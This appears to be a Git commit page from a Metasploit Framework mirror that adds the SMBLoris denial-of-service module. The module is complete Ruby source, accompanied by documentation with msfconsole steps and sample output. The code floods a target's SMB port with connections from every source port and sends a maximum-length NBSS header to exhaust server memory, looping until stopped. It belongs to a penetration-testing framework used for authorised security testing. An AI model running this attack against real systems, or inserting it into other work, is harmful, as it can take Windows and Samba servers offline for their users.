infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #8796, SMBLoris Denial of Service Module.

bug/bundler_fix
Pearce Barry 2017-08-09 16:24:55 -05:00
parent 1b6acd768e 901a1fdd1b
commit bb5fffebc4
No known key found for this signature in database
GPG Key ID: 0916F4DEA5C5DE0A
2 changed files with 132 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

43
documentation/modules/auxiliary/dos/smb/smb_loris.md Normal file
View File

@ -0,0 +1,43 @@
## Vulnerable Application
This module exploits a vulnerability in the NetBIOS Session Service Header for SMB.
Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable.
See [the SMBLoris page](http://smbloris.com/) for details on the vulnerability.
The module opens over 64,000 connections to the target service, so please make sure
your system ULIMIT is set appropriately to handle it. A single host running this module
can theoretically consume up to 8GB of memory on the target.
## Verification Steps
Example steps in this format (is also in the PR):
1. Start msfconsole
1. Do: `use auxiliary/dos/smb/smb_loris`
1. Do: `set RHOST [IP]`
1. Do: `run`
1. Target should allocate increasing amounts of memory.
## Scenarios
###
```
msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris
msf auxiliary(smb_loris) > set RHOST 192.168.172.138
RHOST => 192.168.172.138
msf auxiliary(smb_loris) >
msf auxiliary(smb_loris) > run
[*] 192.168.172.138:445 - Sending packet from Source Port: 1025
[*] 192.168.172.138:445 - Sending packet from Source Port: 1026
[*] 192.168.172.138:445 - Sending packet from Source Port: 1027
[*] 192.168.172.138:445 - Sending packet from Source Port: 1028
[*] 192.168.172.138:445 - Sending packet from Source Port: 1029
[*] 192.168.172.138:445 - Sending packet from Source Port: 1030
[*] 192.168.172.138:445 - Sending packet from Source Port: 1031
[*] 192.168.172.138:445 - Sending packet from Source Port: 1032
[*] 192.168.172.138:445 - Sending packet from Source Port: 1033
....
```

89
modules/auxiliary/dos/smb/smb_loris.rb Normal file
View File

@ -0,0 +1,89 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'bindata'
require 'ruby_smb'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
class NbssHeader < BinData::Record
endian :little
uint8 :message_type
bit7 :flags
bit17 :message_length
end
def initialize(info = {})
super(update_info(info,
'Name' => 'SMBLoris NBSS Denial of Service',
'Description' => %q{
The SMBLoris attack consumes large chunks of memory in the target by sending
SMB requests with the NetBios Session Service(NBSS) Length Header value set
to the maximum possible value. By keeping these connections open and initiating
large numbers of these sessions, the memory does not get freed, and the server
grinds to a halt. This vulnerability was originally disclosed by Sean Dillon
and Zach Harding.
DISCALIMER: This module opens a lot of simultaneous connections. Please check
your system's ULIMIT to make sure it can handle it. This module will also run
continuously until stopped.
},
'Author' =>
[
'thelightcosine'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://smbloris.com/' ]
],
'DisclosureDate' => 'Jul 29 2017'
))
register_options(
[
Opt::RPORT(445)
])
end
def run
header = NbssHeader.new
header.message_length = 0x01FFFF
linger = Socket::Option.linger(true, 60)
while true do
sockets = {}
(1025..65535).each do |src_port|
print_status "Sending packet from Source Port: #{src_port}"
opts = {
'CPORT' => src_port,
'ConnectTimeout' => 360
}
if sockets[src_port]
disconnect(sockets[src_port])
end
begin
nsock = connect(false, opts)
nsock.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true)
nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPCNT, 5))
nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10))
nsock.setsockopt(linger)
nsock.write(header.to_binary_s)
sockets[src_port] = nsock
rescue ::Exception => e
print_error "Exception sending packet: #{e.message}"
end
end
end
end
end